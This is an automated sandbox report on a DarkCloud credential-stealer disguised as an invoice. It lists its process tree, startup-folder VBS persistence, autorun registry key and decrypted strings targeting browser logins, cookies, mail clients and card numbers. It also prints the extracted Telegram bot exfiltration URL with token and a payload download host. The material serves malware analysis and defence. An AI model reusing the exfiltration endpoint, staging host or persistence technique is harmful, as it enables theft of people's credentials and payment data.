Joe Sandbox Cloud Basic Analysis Report

Loading Joe Sandbox Report ...

Edit tour

Windows Analysis Report
Factura modificada____678979879.exe

Overview

General Information

Sample name:Factura modificada____678979879.exe
Analysis ID:1557403
MD5:99b76d55171f966b58012daf261412f1
SHA1:a9175919c8ac3b177259c8965cdf04e82cc159aa
SHA256:4a2c971c295d5f317a2aef95a404322e7fcd0d3a74200e4fe30b9e46da623cfb
Tags:exeuser-lowmal3
Infos:

Detection

DarkCloud
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Found malware configuration
Malicious sample detected (through community Yara rule)
Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Drops script at startup location
Suricata IDS alerts for network traffic
Yara detected AntiVM3
Yara detected DarkCloud
Yara detected Generic Dropper
.NET source code contains potential unpacker
AI detected suspicious sample
Drops VBS files to the startup folder
Machine Learning detection for dropped file
Machine Learning detection for sample
Sample uses string decryption to hide its real strings
Sigma detected: WScript or CScript Dropper
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal browser information (history, passwords, etc)
Windows Scripting host queries suspicious COM object (likely to drop second stage)
Writes or reads registry keys via WMI
Yara detected Costura Assembly Loader
Allocates memory with a write watch (potentially for evading sandboxes)
Contains long sleeps (>= 3 min)
Creates a process in suspended mode (likely to inject code)
Creates a start menu entry (Start Menu\Programs\Startup)
Detected potential crypto function
Drops PE files
Enables debug privileges
Found WSH timer for Javascript or VBS script (likely evasive script)
Found a high number of Window / User specific system calls (may be a loop to detect user behavior)
HTTP GET or POST without a user agent
IP address seen in connection with other malware
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May check the online IP address of the machine
May sleep (evasive loops) to hinder dynamic analysis
Queries the volume information (name, serial number etc) of a device
Sample file is different than original file name gathered from version info
Sigma detected: CurrentVersion Autorun Keys Modification
Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
Stores files to the Windows start menu directory
Suricata IDS alerts with low severity for network traffic
Uses 32bit PE files
Uses code obfuscation techniques (call, push, ret)
Yara signature match

Classification

Process Tree

  • System is w10x64
  • Factura modificada____678979879.exe (PID: 7780 cmdline: "C:\Users\user\Desktop\Factura modificada____678979879.exe" MD5: 99B76D55171F966B58012DAF261412F1)
    • InstallUtil.exe (PID: 8072 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • wscript.exe (PID: 1004 cmdline: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs" MD5: A47CBE969EA935BDD3AB568BB126BC80)
    • WrappedObject.exe (PID: 5784 cmdline: "C:\Users\user\AppData\Roaming\WrappedObject.exe" MD5: 99B76D55171F966B58012DAF261412F1)
      • InstallUtil.exe (PID: 2980 cmdline: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
  • fitfulness.exe (PID: 7736 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 3540 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • fitfulness.exe (PID: 3452 cmdline: "C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe" MD5: 5D4073B2EB6D217C19F2B22F21BF8D57)
    • conhost.exe (PID: 5952 cmdline: C:\Windows\system32\conhost.exe 0xffffffff -ForceV1 MD5: 0D698AF330FD17BEE3BF90011D49251D)
  • cleanup

Malware Threat Intel

Provided by

NameDescriptionAttributionBlogpost URLsLink
DarkCloud StealerStealer is written in Visual Basic.No Attributionhttps://malpedia.caad.fkie.fraunhofer.de/details/win.darkcloud

Malware Configuration

Threatname: DarkCloud

{"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7824077250:AAFcoqx_HuY2oC2csA-0G-hez0Tv78Sn08E/sendMessage?chat_id=7546472414"}

Yara Signatures

Memory Dumps

SourceRuleDescriptionAuthorStrings
00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
    00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
    • 0x3870:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
    00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
      00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmpLokiBot_Dropper_Packed_R11_Feb18Auto-generated rule - file scan copy.pdf.r11Florian Roth
      • 0x3a88:$s1: C:\Program Files (x86)\Microsoft Visual Studio\VB98\VB6.OLB
      00000008.00000002.1740206396.00000000045F0000.00000004.00000800.00020000.00000000.sdmpJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
        Click to see the 16 entries

        Unpacked PEs

        SourceRuleDescriptionAuthorStrings
        1.2.Factura modificada____678979879.exe.6dc0000.13.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
          1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
            1.2.Factura modificada____678979879.exe.3ef3468.8.unpackJoeSecurity_DarkCloudYara detected DarkCloudJoe Security
              1.2.Factura modificada____678979879.exe.4a60070.10.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                1.2.Factura modificada____678979879.exe.47bb610.5.raw.unpackJoeSecurity_CosturaAssemblyLoaderYara detected Costura Assembly LoaderJoe Security
                  Click to see the 1 entries

                  Sigma Signatures

                  System Summary

                  barindex
                  Sigma detected: WScript or CScript Dropper
                  Source: Process startedAuthor: Margaritis Dimitrios (idea), Florian Roth (Nextron Systems), oscd.community: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs" , ProcessId: 1004, ProcessName: wscript.exe
                  Sigma detected: CurrentVersion Autorun Keys Modification
                  Source: Registry Key setAuthor: Victor Sergeev, Daniil Yugoslavskiy, Gleb Sukhodolskiy, Timur Zinniatullin, oscd.community, Tim Shelton, frack113 (split): Data: Details: C:\Users\user\AppData\Roaming\Microsoft\Windows\Templates\fitfulness.exe, EventID: 13, EventType: SetValue, Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe, ProcessId: 8072, TargetObject: HKEY_CURRENT_USER\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce\flammigerous
                  Sigma detected: WSF/JSE/JS/VBA/VBE File Execution Via Cscript/Wscript
                  Source: Process startedAuthor: Michael Haag: Data: Command: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs" , CommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs" , CommandLine|base64offset|contains: , Image: C:\Windows\System32\wscript.exe, NewProcessName: C:\Windows\System32\wscript.exe, OriginalFileName: C:\Windows\System32\wscript.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 4056, ProcessCommandLine: "C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs" , ProcessId: 1004, ProcessName: wscript.exe

                  Data Obfuscation

                  barindex
                  Sigma detected: Drops script at startup location
                  Source: File createdAuthor: Joe Security: Data: EventID: 11, Image: C:\Users\user\Desktop\Factura modificada____678979879.exe, ProcessId: 7780, TargetFilename: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\WrappedObject.vbs

                  Suricata Signatures

                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-18T08:30:14.596800+010020226401A Network Trojan was detected218.208.91.137443192.168.2.749700TCP
                  2024-11-18T08:30:37.368981+010020226401A Network Trojan was detected218.208.91.137443192.168.2.749808TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-18T08:30:14.596800+010020179621A Network Trojan was detected218.208.91.137443192.168.2.749700TCP
                  2024-11-18T08:30:37.368981+010020179621A Network Trojan was detected218.208.91.137443192.168.2.749808TCP
                  TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                  2024-11-18T08:30:24.505640+010028032742Potentially Bad Traffic192.168.2.749742162.55.60.280TCP
                  2024-11-18T08:31:33.208464+010028032742Potentially Bad Traffic192.168.2.749974162.55.60.280TCP

                  Joe Sandbox Signatures

                  Click to jump to signature section

                  Show All Signature Results

                  AV Detection

                  barindex
                  Found malware configuration
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackMalware Configuration Extractor: DarkCloud {"Exfil Mode": "Telegram", "Telegram URL": "https://api.telegram.org/bot7824077250:AAFcoqx_HuY2oC2csA-0G-hez0Tv78Sn08E/sendMessage?chat_id=7546472414"}
                  Multi AV Scanner detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeReversingLabs: Detection: 57%
                  Multi AV Scanner detection for submitted file
                  Source: Factura modificada____678979879.exeReversingLabs: Detection: 57%
                  Source: Factura modificada____678979879.exeVirustotal: Detection: 63%Perma Link
                  AI detected suspicious sample
                  Source: Submited SampleIntegrated Neural Analysis Model: Matched 100.0% probability
                  Machine Learning detection for dropped file
                  Source: C:\Users\user\AppData\Roaming\WrappedObject.exeJoe Sandbox ML: detected
                  Machine Learning detection for sample
                  Source: Factura modificada____678979879.exeJoe Sandbox ML: detected
                  Sample uses string decryption to hide its real strings
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Cookies
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: \Default\Login Data
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: \Login Data
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: //setting[@name='Password']/value
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Password :
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Software\Microsoft\Windows NT\CurrentVersion\Windows Messaging Subsystem\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Software\Microsoft\Windows Messaging Subsystem\Profiles\9375CFF0413111d3B88A00104B2A6676
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Software\Martin Prikryl\WinSCP 2\Sessions
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: SMTP Email Address
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: NNTP Email Address
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Email
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: HTTPMail User Name
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: HTTPMail Server
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^([a-zA-Z0-9_\-\.]+)@([a-zA-Z0-9_\-\.]+)\.([a-zA-Z]{2,5})$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^(?!:\/\/)([a-zA-Z0-9-_]+\.)[a-zA-Z0-9][a-zA-Z0-9-_]+\.[a-zA-Z]{2,11}?$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Password
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^3[47][0-9]{13}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^(6541|6556)[0-9]{12}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^389[0-9]{11}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Visa Card
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^3(?:0[0-5]|[68][0-9])[0-9]{11}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^63[7-9][0-9]{13}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^(?:2131|1800|35\\d{3})\\d{11}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^9[0-9]{15}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^(6304|6706|6709|6771)[0-9]{12,15}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^(5018|5020|5038|6304|6759|6761|6763)[0-9]{8,15}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Mastercard
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^(6334|6767)[0-9]{12}|(6334|6767)[0-9]{14}|(6334|6767)[0-9]{15}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^(4903|4905|4911|4936|6333|6759)[0-9]{12}|(4903|4905|4911|4936|6333|6759)[0-9]{14}|(4903|4905|4911|4936|6333|6759)[0-9]{15}|564182[0-9]{10}|564182[0-9]{12}|564182[0-9]{13}|633110[0-9]{10}|633110[0-9]{12}|633110[0-9]{13}$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^(62[0-9]{14,17})$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: ^(?:4[0-9]{12}(?:[0-9]{3})?|5[1-5][0-9]{14})$
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Visa Master Card
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: \signons.sqlite
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Foxmail.exe
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: mail\
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: \Accounts\Account.rec0
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: EnableSignature
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: Application : FoxMail
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: encryptedUsername
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: logins
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: encryptedPassword
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: \Default\Cookies
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: \Cookies
                  Source: 1.2.Factura modificada____678979879.exe.3ef3468.8.raw.unpackString decryptor: \cookies.db
                  Source: Factura modificada____678979879.exeStatic PE information: EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                  Source: unknownHTTPS traffic detected: 218.208.91.137:443 -> 192.168.2.7:49700 version: TLS 1.2
                  Source: unknownHTTPS traffic detected: 218.208.91.137:443 -> 192.168.2.7:49808 version: TLS 1.2
                  Source: Factura modificada____678979879.exeStatic PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdbSHA256e source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003E11000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1405689602.0000000006F00000.00000004.08000000.00040000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1740206396.00000000039F7000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.0000000002B23000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: W.pdb4 source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000003032000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003F32000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2545997056.0000000000438000.00000040.00000400.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1740206396.0000000003BD9000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.0000000002C1E000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: C:\Users\dahall\Documents\GitHubRepos\TaskScheduler\TaskService\obj\Release\net40\Microsoft.Win32.TaskScheduler.pdb source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E70000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003E11000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1405689602.0000000006F00000.00000004.08000000.00040000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1740206396.00000000039F7000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.0000000002B23000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb\rvr hr_CorExeMainmscoree.dll source: InstallUtil.exe, 00000004.00000002.2549138176.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, fitfulness.exe, 00000009.00000000.1644425682.0000000000092000.00000002.00000001.01000000.0000000E.sdmp, fitfulness.exe.4.dr
                  Source: Binary string: protobuf-net.pdbSHA256}Lq source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: protobuf-net.pdb source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmp
                  Source: Binary string: InstallUtil.pdb source: InstallUtil.exe, 00000004.00000002.2549138176.0000000000EF0000.00000004.00000020.00020000.00000000.sdmp, fitfulness.exe, 00000009.00000000.1644425682.0000000000092000.00000002.00000001.01000000.0000000E.sdmp, fitfulness.exe.4.dr

                  Networking

                  barindex
                  Suricata IDS alerts for network traffic
                  Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 218.208.91.137:443 -> 192.168.2.7:49700
                  Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 218.208.91.137:443 -> 192.168.2.7:49700
                  Source: Network trafficSuricata IDS: 2017962 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download disguised as ASCII : 218.208.91.137:443 -> 192.168.2.7:49808
                  Source: Network trafficSuricata IDS: 2022640 - Severity 1 - ET MALWARE PE EXE or DLL Windows file download Text M2 : 218.208.91.137:443 -> 192.168.2.7:49808
                  Source: global trafficHTTP traffic detected: GET /Ggclxuylpwh.mp3 HTTP/1.1Host: karmanorbuling.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Ggclxuylpwh.mp3 HTTP/1.1Host: karmanorbuling.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Ggclxuylpwh.mp3 HTTP/1.1Host: karmanorbuling.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Ggclxuylpwh.mp3 HTTP/1.1Host: karmanorbuling.orgConnection: Keep-Alive
                  Source: Joe Sandbox ViewIP Address: 218.208.91.137 218.208.91.137
                  Source: Joe Sandbox ViewIP Address: 162.55.60.2 162.55.60.2
                  Source: Joe Sandbox ViewASN Name: TMNET-AS-APTMNetInternetServiceProviderMY TMNET-AS-APTMNetInternetServiceProviderMY
                  Source: Joe Sandbox ViewJA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e
                  Source: unknownDNS query: name: showip.net
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49742 -> 162.55.60.2:80
                  Source: Network trafficSuricata IDS: 2803274 - Severity 2 - ETPRO MALWARE Common Downloader Header Pattern UH : 192.168.2.7:49974 -> 162.55.60.2:80
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                  Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeCode function: 11_2_004330D0 InternetOpenA,InternetOpenUrlA,InternetReadFile,11_2_004330D0
                  Source: global trafficHTTP traffic detected: GET /Ggclxuylpwh.mp3 HTTP/1.1Host: karmanorbuling.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Ggclxuylpwh.mp3 HTTP/1.1Host: karmanorbuling.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET /Ggclxuylpwh.mp3 HTTP/1.1Host: karmanorbuling.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
                  Source: global trafficHTTP traffic detected: GET /Ggclxuylpwh.mp3 HTTP/1.1Host: karmanorbuling.orgConnection: Keep-Alive
                  Source: global trafficHTTP traffic detected: GET / HTTP/1.1User-Agent: Project1Host: showip.net
                  Source: global trafficDNS traffic detected: DNS query: karmanorbuling.org
                  Source: global trafficDNS traffic detected: DNS query: showip.net
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: http://entityframework-plus.net/
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://karmanorbuling.org
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1715825407.0000000000C23000.00000004.00000020.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://karmanorbuling.org/Ggclxuylpwh.mp3
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1386800607.0000000002E11000.00000004.00000800.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1724721626.00000000029A1000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                  Source: InstallUtil.exe, 00000004.00000002.2547967703.0000000000E8A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net
                  Source: InstallUtil.exe, 00000004.00000002.2547967703.0000000000E5C000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/
                  Source: InstallUtil.exe, 0000000B.00000002.2547970076.00000000012FF000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/&
                  Source: InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/aProgramFiles
                  Source: InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/ta
                  Source: InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.net/u%/
                  Source: InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.netD2
                  Source: InstallUtil.exe, 00000004.00000002.2547967703.0000000000E8A000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.netll
                  Source: InstallUtil.exe, 0000000B.00000002.2547970076.00000000012D0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://showip.netsr
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003FBF000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000003EB7000.00000004.00000800.00020000.00000000.sdmp, InstallUtil.exe, InstallUtil.exe, 00000004.00000002.2545997056.0000000000401000.00000040.00000400.00020000.00000000.sdmp, WrappedObject.exe, 00000008.00000002.1740206396.0000000003B4C000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://api.telegram.org/bot
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://bulk-operations.net/pricing.
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://dapper-plus.net/getting-started-mapping#instance-context-mapping.
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://dapper-plus.net/pricing.
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://dapper-plus.net7https://bulk-operations.net
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://entityframework-extensions.net/)
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://entityframework-extensions.net/include-graph).
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://entityframework-extensions.net/md5-exception
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://entityframework-extensions.net/pricing.
                  Source: InstallUtil.exe, 00000004.00000002.2549138176.0000000000EE2000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2549138176.0000000000F03000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 00000004.00000002.2549700595.0000000000F27000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.0000000001319000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2551127147.0000000004846000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2551091737.0000000004840000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2549708231.000000000134A000.00000004.00000020.00020000.00000000.sdmp, InstallUtil.exe, 0000000B.00000002.2547970076.0000000001326000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: https://fundingchoicesmessages.google.com/i/pub-8790158038613050?ers=1
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-net
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-netJ
                  Source: Factura modificada____678979879.exe, 00000001.00000002.1393807620.0000000004021000.00000004.00000800.00020000.00000000.sdmp, Factura modificada____678979879.exe, 00000001.00000002.1404350168.0000000006CF0000.00000004.08000000.00040000.00000000.sdmpString found in binary or memory: https://github.com/mgravell/protobuf-neti
                  Source: Factura modificada____678979879.exe, WrappedObject.exe.1.drString found in binary or memory: https://github.com/npgsql/npgsql/issues/2623#issuecomment-6276222151Oops
